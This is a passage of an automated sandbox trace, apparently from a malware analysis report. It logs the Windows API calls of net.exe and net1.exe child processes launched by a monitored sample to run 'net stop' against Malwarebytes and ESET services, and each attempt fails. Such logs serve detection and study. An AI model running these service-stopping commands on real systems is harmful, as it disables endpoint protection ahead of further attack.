HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0209.386] GetConsoleOutputCP () returned 0x1b5 [0209.386] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x789080 | out: lpCPInfo=0x789080) returned 1 [0209.386] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.389] sprintf_s (in: _DstBuf=0xefbd0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0209.389] setlocale (category=0, locale=".437") returned="English_United States.437" [0209.391] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0209.391] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0209.391] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MBAMService /y" [0209.391] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xef99c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0209.391] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x6a) returned 0x413c10 [0209.391] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0209.392] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefba0 | out: Buffer=0xefba0*=0x411c70) returned 0x0 [0209.392] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xefba0 | out: Buffer=0xefba0*=0x411c88) returned 0x0 [0209.392] _fileno (_File=0x74eb2900) returned -2 [0209.392] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0209.392] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0209.392] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0209.392] _wcsicmp (_String1="config", _String2="stop") returned -16 [0209.392] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0209.392] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0209.392] _wcsicmp (_String1="file", _String2="stop") returned -13 [0209.392] _wcsicmp (_String1="files", _String2="stop") returned -13 [0209.392] _wcsicmp (_String1="group", _String2="stop") returned -12 [0209.392] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0209.392] _wcsicmp (_String1="help", _String2="stop") returned -11 [0209.392] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0209.392] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0209.392] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0209.392] _wcsicmp (_String1="session", _String2="stop") returned -15 [0209.392] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0209.392] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0209.392] _wcsicmp (_String1="share", _String2="stop") returned -12 [0209.392] _wcsicmp (_String1="start", _String2="stop") returned -14 [0209.392] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0209.392] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0209.392] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0209.392] _wcsicmp (_String1="accounts", _String2="MBAMService") returned -12 [0209.392] _wcsicmp (_String1="computer", _String2="MBAMService") returned -10 [0209.392] _wcsicmp (_String1="config", _String2="MBAMService") returned -10 [0209.392] _wcsicmp (_String1="continue", _String2="MBAMService") returned -10 [0209.392] _wcsicmp (_String1="cont", _String2="MBAMService") returned -10 [0209.392] _wcsicmp (_String1="file", _String2="MBAMService") returned -7 [0209.393] _wcsicmp (_String1="files", _String2="MBAMService") returned -7 [0209.393] _wcsicmp (_String1="group", _String2="MBAMService") returned -6 [0209.393] _wcsicmp (_String1="groups", _String2="MBAMService") returned -6 [0209.393] _wcsicmp (_String1="help", _String2="MBAMService") returned -5 [0209.393] _wcsicmp (_String1="helpmsg", _String2="MBAMService") returned -5 [0209.393] _wcsicmp (_String1="localgroup", _String2="MBAMService") returned -1 [0209.393] _wcsicmp (_String1="pause", _String2="MBAMService") returned 3 [0209.393] _wcsicmp (_String1="session", _String2="MBAMService") returned 6 [0209.393] _wcsicmp (_String1="sessions", _String2="MBAMService") returned 6 [0209.393] _wcsicmp (_String1="sess", _String2="MBAMService") returned 6 [0209.393] _wcsicmp (_String1="share", _String2="MBAMService") returned 6 [0209.393] _wcsicmp (_String1="start", _String2="MBAMService") returned 6 [0209.393] _wcsicmp (_String1="stats", _String2="MBAMService") returned 6 [0209.393] _wcsicmp (_String1="statistics", _String2="MBAMService") returned 6 [0209.393] _wcsicmp (_String1="stop", _String2="MBAMService") returned 6 [0209.393] _wcsicmp (_String1="time", _String2="MBAMService") returned 7 [0209.393] _wcsicmp (_String1="user", _String2="MBAMService") returned 8 [0209.393] _wcsicmp (_String1="users", _String2="MBAMService") returned 8 [0209.393] _wcsicmp (_String1="msg", _String2="MBAMService") returned 17 [0209.393] _wcsicmp (_String1="messenger", _String2="MBAMService") returned 3 [0209.393] _wcsicmp (_String1="receiver", _String2="MBAMService") returned 5 [0209.393] _wcsicmp (_String1="rcv", _String2="MBAMService") returned 5 [0209.393] _wcsicmp (_String1="netpopup", _String2="MBAMService") returned 1 [0209.393] _wcsicmp (_String1="redirector", _String2="MBAMService") returned 5 [0209.393] _wcsicmp (_String1="redir", _String2="MBAMService") returned 5 [0209.393] _wcsicmp (_String1="rdr", _String2="MBAMService") returned 5 [0209.393] _wcsicmp (_String1="workstation", _String2="MBAMService") returned 10 [0209.393] _wcsicmp (_String1="work", _String2="MBAMService") returned 10 [0209.393] _wcsicmp (_String1="wksta", _String2="MBAMService") returned 10 [0209.393] _wcsicmp (_String1="prdr", _String2="MBAMService") returned 3 [0209.393] _wcsicmp (_String1="devrdr", _String2="MBAMService") returned -9 [0209.393] _wcsicmp (_String1="lanmanworkstation", _String2="MBAMService") returned -1 [0209.393] _wcsicmp (_String1="server", _String2="MBAMService") returned 6 [0209.393] _wcsicmp (_String1="svr", _String2="MBAMService") returned 6 [0209.393] _wcsicmp (_String1="srv", _String2="MBAMService") returned 6 [0209.393] _wcsicmp (_String1="lanmanserver", _String2="MBAMService") returned -1 [0209.393] _wcsicmp (_String1="alerter", _String2="MBAMService") returned -12 [0209.393] _wcsicmp (_String1="netlogon", _String2="MBAMService") returned 1 [0209.394] _wcsupr (in: _String="MBAMService" | out: _String="MBAMSERVICE") returned="MBAMSERVICE" [0209.394] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4154d0 [0209.396] GetServiceKeyNameW (in: hSCManager=0x4154d0, lpDisplayName="MBAMSERVICE", lpServiceName=0x78aaf0, lpcchBuffer=0xefb3c | out: lpServiceName="", lpcchBuffer=0xefb3c) returned 0 [0209.397] _wcsicmp (_String1="msg", _String2="MBAMSERVICE") returned 17 [0209.397] _wcsicmp (_String1="messenger", _String2="MBAMSERVICE") returned 3 [0209.397] _wcsicmp (_String1="receiver", _String2="MBAMSERVICE") returned 5 [0209.397] _wcsicmp (_String1="rcv", _String2="MBAMSERVICE") returned 5 [0209.397] _wcsicmp (_String1="redirector", _String2="MBAMSERVICE") returned 5 [0209.397] _wcsicmp (_String1="redir", _String2="MBAMSERVICE") returned 5 [0209.397] _wcsicmp (_String1="rdr", _String2="MBAMSERVICE") returned 5 [0209.397] _wcsicmp (_String1="workstation", _String2="MBAMSERVICE") returned 10 [0209.397] _wcsicmp (_String1="work", _String2="MBAMSERVICE") returned 10 [0209.397] _wcsicmp (_String1="wksta", _String2="MBAMSERVICE") returned 10 [0209.397] _wcsicmp (_String1="prdr", _String2="MBAMSERVICE") returned 3 [0209.397] _wcsicmp (_String1="devrdr", _String2="MBAMSERVICE") returned -9 [0209.397] _wcsicmp (_String1="lanmanworkstation", _String2="MBAMSERVICE") returned -1 [0209.397] _wcsicmp (_String1="server", _String2="MBAMSERVICE") returned 6 [0209.397] _wcsicmp (_String1="svr", _String2="MBAMSERVICE") returned 6 [0209.397] _wcsicmp (_String1="srv", _String2="MBAMSERVICE") returned 6 [0209.397] _wcsicmp (_String1="lanmanserver", _String2="MBAMSERVICE") returned -1 [0209.397] _wcsicmp (_String1="alerter", _String2="MBAMSERVICE") returned -12 [0209.397] _wcsicmp (_String1="netlogon", _String2="MBAMSERVICE") returned 1 [0209.397] NetServiceControl (in: servername=0x0, service="MBAMSERVICE", opcode=0x0, arg=0x0, bufptr=0xefb38 | out: bufptr=0xefb38) returned 0x889 [0209.398] wcscpy_s (in: _Destination=0x78a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0209.398] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0209.399] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x78b338, nSize=0x800, Arguments=0x789dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0209.400] GetFileType (hFile=0x26c) returned 0x3 [0209.400] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x414000 [0209.400] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x414000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0209.400] WriteFile (in: hFile=0x26c, lpBuffer=0x414000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xefa78, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefa78, lpOverlapped=0x0) returned 0 [0209.400] LocalFree (hMem=0x414000) returned 0x0 [0209.400] GetFileType (hFile=0x26c) returned 0x3 [0209.400] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4162a8 [0209.400] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4162a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nA", lpUsedDefaultChar=0x0) returned 2 [0209.400] WriteFile (in: hFile=0x26c, lpBuffer=0x4162a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xefa78, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefa78, lpOverlapped=0x0) returned 0 [0209.400] LocalFree (hMem=0x4162a8) returned 0x0 [0209.400] _ultow (in: _Dest=0x889, _Radix=981672 | out: _Dest=0x889) returned="2185" [0209.400] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x78b338, nSize=0x800, Arguments=0x789dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0209.400] GetFileType (hFile=0x26c) returned 0x3 [0209.401] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4162a8 [0209.401] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4162a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0209.401] WriteFile (in: hFile=0x26c, lpBuffer=0x4162a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xefa84, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefa84, lpOverlapped=0x0) returned 0 [0209.401] LocalFree (hMem=0x4162a8) returned 0x0 [0209.401] GetFileType (hFile=0x26c) returned 0x3 [0209.401] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4162a8 [0209.401] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4162a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nA", lpUsedDefaultChar=0x0) returned 2 [0209.401] WriteFile (in: hFile=0x26c, lpBuffer=0x4162a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xefa84, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefa84, lpOverlapped=0x0) returned 0 [0209.401] LocalFree (hMem=0x4162a8) returned 0x0 [0209.401] NetApiBufferFree (Buffer=0x411c70) returned 0x0 [0209.402] NetApiBufferFree (Buffer=0x411c88) returned 0x0 [0209.402] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MBAMService /y" [0209.402] exit (_Code=2) Process: id = "272" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4ae6c000" os_pid = "0x750" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop EsgShKernel /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 445 os_tid = 0x730 Process: id = "273" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6b5e2000" os_pid = "0xaa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "272" os_parent_pid = "0x750" cmd_line = "C:\\Windows\\system32\\net1 stop EsgShKernel /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 446 os_tid = 0xa20 [0209.565] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfb50 | out: lpSystemTimeAsFileTime=0x1cfb50*(dwLowDateTime=0x4619b080, dwHighDateTime=0x1d57a87)) [0209.565] GetCurrentProcessId () returned 0xaa4 [0209.565] GetCurrentThreadId () returned 0xa20 [0209.565] GetTickCount () returned 0x116dfb5 [0209.565] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfb48 | out: lpPerformanceCount=0x1cfb48*=32985011165) returned 1 [0209.566] GetModuleHandleA (lpModuleName=0x0) returned 0x6d0000 [0209.566] __set_app_type (_Type=0x1) [0209.566] __p__fmode () returned 0x74eb31f4 [0209.566] __p__commode () returned 0x74eb31fc [0209.566] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x6dffe6) returned 0x0 [0209.566] __getmainargs (in: _Argc=0x6e9064, _Argv=0x6e906c, _Env=0x6e9068, _DoWildCard=0, _StartInfo=0x6e9024 | out: _Argc=0x6e9064, _Argv=0x6e906c, _Env=0x6e9068) returned 0 [0209.566] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0209.566] GetConsoleOutputCP () returned 0x1b5 [0209.566] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x6e9080 | out: lpCPInfo=0x6e9080) returned 1 [0209.566] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.570] sprintf_s (in: _DstBuf=0x1cfb08, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0209.570] setlocale (category=0, locale=".437") returned="English_United States.437" [0209.572] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0209.572] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0209.572] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EsgShKernel /y" [0209.572] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf8d4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0209.572] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x6a) returned 0x363c10 [0209.572] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0209.572] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cfad8 | out: Buffer=0x1cfad8*=0x361c70) returned 0x0 [0209.573] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cfad8 | out: Buffer=0x1cfad8*=0x361c88) returned 0x0 [0209.573] _fileno (_File=0x74eb2900) returned -2 [0209.573] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0209.573] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0209.573] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0209.573] _wcsicmp (_String1="config", _String2="stop") returned -16 [0209.573] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0209.573] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0209.573] _wcsicmp (_String1="file", _String2="stop") returned -13 [0209.573] _wcsicmp (_String1="files", _String2="stop") returned -13 [0209.573] _wcsicmp (_String1="group", _String2="stop") returned -12 [0209.573] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0209.573] _wcsicmp (_String1="help", _String2="stop") returned -11 [0209.573] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0209.573] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0209.573] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0209.573] _wcsicmp (_String1="session", _String2="stop") returned -15 [0209.573] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0209.573] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0209.573] _wcsicmp (_String1="share", _String2="stop") returned -12 [0209.573] _wcsicmp (_String1="start", _String2="stop") returned -14 [0209.573] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0209.573] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0209.573] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0209.573] _wcsicmp (_String1="accounts", _String2="EsgShKernel") returned -4 [0209.573] _wcsicmp (_String1="computer", _String2="EsgShKernel") returned -2 [0209.573] _wcsicmp (_String1="config", _String2="EsgShKernel") returned -2 [0209.573] _wcsicmp (_String1="continue", _String2="EsgShKernel") returned -2 [0209.573] _wcsicmp (_String1="cont", _String2="EsgShKernel") returned -2 [0209.574] _wcsicmp (_String1="file", _String2="EsgShKernel") returned 1 [0209.574] _wcsicmp (_String1="files", _String2="EsgShKernel") returned 1 [0209.574] _wcsicmp (_String1="group", _String2="EsgShKernel") returned 2 [0209.574] _wcsicmp (_String1="groups", _String2="EsgShKernel") returned 2 [0209.574] _wcsicmp (_String1="help", _String2="EsgShKernel") returned 3 [0209.574] _wcsicmp (_String1="helpmsg", _String2="EsgShKernel") returned 3 [0209.574] _wcsicmp (_String1="localgroup", _String2="EsgShKernel") returned 7 [0209.574] _wcsicmp (_String1="pause", _String2="EsgShKernel") returned 11 [0209.574] _wcsicmp (_String1="session", _String2="EsgShKernel") returned 14 [0209.574] _wcsicmp (_String1="sessions", _String2="EsgShKernel") returned 14 [0209.574] _wcsicmp (_String1="sess", _String2="EsgShKernel") returned 14 [0209.574] _wcsicmp (_String1="share", _String2="EsgShKernel") returned 14 [0209.574] _wcsicmp (_String1="start", _String2="EsgShKernel") returned 14 [0209.574] _wcsicmp (_String1="stats", _String2="EsgShKernel") returned 14 [0209.574] _wcsicmp (_String1="statistics", _String2="EsgShKernel") returned 14 [0209.574] _wcsicmp (_String1="stop", _String2="EsgShKernel") returned 14 [0209.574] _wcsicmp (_String1="time", _String2="EsgShKernel") returned 15 [0209.574] _wcsicmp (_String1="user", _String2="EsgShKernel") returned 16 [0209.574] _wcsicmp (_String1="users", _String2="EsgShKernel") returned 16 [0209.574] _wcsicmp (_String1="msg", _String2="EsgShKernel") returned 8 [0209.574] _wcsicmp (_String1="messenger", _String2="EsgShKernel") returned 8 [0209.574] _wcsicmp (_String1="receiver", _String2="EsgShKernel") returned 13 [0209.574] _wcsicmp (_String1="rcv", _String2="EsgShKernel") returned 13 [0209.574] _wcsicmp (_String1="netpopup", _String2="EsgShKernel") returned 9 [0209.574] _wcsicmp (_String1="redirector", _String2="EsgShKernel") returned 13 [0209.574] _wcsicmp (_String1="redir", _String2="EsgShKernel") returned 13 [0209.574] _wcsicmp (_String1="rdr", _String2="EsgShKernel") returned 13 [0209.574] _wcsicmp (_String1="workstation", _String2="EsgShKernel") returned 18 [0209.574] _wcsicmp (_String1="work", _String2="EsgShKernel") returned 18 [0209.574] _wcsicmp (_String1="wksta", _String2="EsgShKernel") returned 18 [0209.574] _wcsicmp (_String1="prdr", _String2="EsgShKernel") returned 11 [0209.574] _wcsicmp (_String1="devrdr", _String2="EsgShKernel") returned -1 [0209.574] _wcsicmp (_String1="lanmanworkstation", _String2="EsgShKernel") returned 7 [0209.574] _wcsicmp (_String1="server", _String2="EsgShKernel") returned 14 [0209.574] _wcsicmp (_String1="svr", _String2="EsgShKernel") returned 14 [0209.574] _wcsicmp (_String1="srv", _String2="EsgShKernel") returned 14 [0209.574] _wcsicmp (_String1="lanmanserver", _String2="EsgShKernel") returned 7 [0209.575] _wcsicmp (_String1="alerter", _String2="EsgShKernel") returned -4 [0209.575] _wcsicmp (_String1="netlogon", _String2="EsgShKernel") returned 9 [0209.575] _wcsupr (in: _String="EsgShKernel" | out: _String="ESGSHKERNEL") returned="ESGSHKERNEL" [0209.575] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3654d0 [0209.577] GetServiceKeyNameW (in: hSCManager=0x3654d0, lpDisplayName="ESGSHKERNEL", lpServiceName=0x6eaaf0, lpcchBuffer=0x1cfa74 | out: lpServiceName="", lpcchBuffer=0x1cfa74) returned 0 [0209.578] _wcsicmp (_String1="msg", _String2="ESGSHKERNEL") returned 8 [0209.578] _wcsicmp (_String1="messenger", _String2="ESGSHKERNEL") returned 8 [0209.578] _wcsicmp (_String1="receiver", _String2="ESGSHKERNEL") returned 13 [0209.578] _wcsicmp (_String1="rcv", _String2="ESGSHKERNEL") returned 13 [0209.578] _wcsicmp (_String1="redirector", _String2="ESGSHKERNEL") returned 13 [0209.578] _wcsicmp (_String1="redir", _String2="ESGSHKERNEL") returned 13 [0209.578] _wcsicmp (_String1="rdr", _String2="ESGSHKERNEL") returned 13 [0209.578] _wcsicmp (_String1="workstation", _String2="ESGSHKERNEL") returned 18 [0209.578] _wcsicmp (_String1="work", _String2="ESGSHKERNEL") returned 18 [0209.578] _wcsicmp (_String1="wksta", _String2="ESGSHKERNEL") returned 18 [0209.578] _wcsicmp (_String1="prdr", _String2="ESGSHKERNEL") returned 11 [0209.578] _wcsicmp (_String1="devrdr", _String2="ESGSHKERNEL") returned -1 [0209.578] _wcsicmp (_String1="lanmanworkstation", _String2="ESGSHKERNEL") returned 7 [0209.578] _wcsicmp (_String1="server", _String2="ESGSHKERNEL") returned 14 [0209.578] _wcsicmp (_String1="svr", _String2="ESGSHKERNEL") returned 14 [0209.578] _wcsicmp (_String1="srv", _String2="ESGSHKERNEL") returned 14 [0209.578] _wcsicmp (_String1="lanmanserver", _String2="ESGSHKERNEL") returned 7 [0209.578] _wcsicmp (_String1="alerter", _String2="ESGSHKERNEL") returned -4 [0209.578] _wcsicmp (_String1="netlogon", _String2="ESGSHKERNEL") returned 9 [0209.578] NetServiceControl (in: servername=0x0, service="ESGSHKERNEL", opcode=0x0, arg=0x0, bufptr=0x1cfa70 | out: bufptr=0x1cfa70) returned 0x889 [0209.579] wcscpy_s (in: _Destination=0x6ea4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0209.579] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0209.580] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x6eb338, nSize=0x800, Arguments=0x6e9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0209.581] GetFileType (hFile=0x26c) returned 0x3 [0209.581] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x364000 [0209.581] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x364000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0209.581] WriteFile (in: hFile=0x26c, lpBuffer=0x364000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1cf9b0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf9b0, lpOverlapped=0x0) returned 0 [0209.581] LocalFree (hMem=0x364000) returned 0x0 [0209.581] GetFileType (hFile=0x26c) returned 0x3 [0209.581] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3662a8 [0209.581] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3662a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n6", lpUsedDefaultChar=0x0) returned 2 [0209.581] WriteFile (in: hFile=0x26c, lpBuffer=0x3662a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf9b0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf9b0, lpOverlapped=0x0) returned 0 [0209.581] LocalFree (hMem=0x3662a8) returned 0x0 [0209.581] _ultow (in: _Dest=0x889, _Radix=1898976 | out: _Dest=0x889) returned="2185" [0209.581] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x6eb338, nSize=0x800, Arguments=0x6e9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0209.581] GetFileType (hFile=0x26c) returned 0x3 [0209.582] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3662a8 [0209.582] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3662a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0209.582] WriteFile (in: hFile=0x26c, lpBuffer=0x3662a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1cf9bc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf9bc, lpOverlapped=0x0) returned 0 [0209.582] LocalFree (hMem=0x3662a8) returned 0x0 [0209.582] GetFileType (hFile=0x26c) returned 0x3 [0209.582] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3662a8 [0209.582] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3662a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n6", lpUsedDefaultChar=0x0) returned 2 [0209.582] WriteFile (in: hFile=0x26c, lpBuffer=0x3662a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf9bc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf9bc, lpOverlapped=0x0) returned 0 [0209.582] LocalFree (hMem=0x3662a8) returned 0x0 [0209.582] NetApiBufferFree (Buffer=0x361c70) returned 0x0 [0209.582] NetApiBufferFree (Buffer=0x361c88) returned 0x0 [0209.582] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EsgShKernel /y" [0209.583] exit (_Code=2) Process: id = "274" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4d271000" os_pid = "0x418" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ESHASRV /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 447 os_tid = 0x6e0 Process: id = "275" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6f674000" os_pid = "0x5e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "274" os_parent_pid = "0x418" cmd_line = "C:\\Windows\\system32\\net1 stop ESHASRV /y" cur_dir = 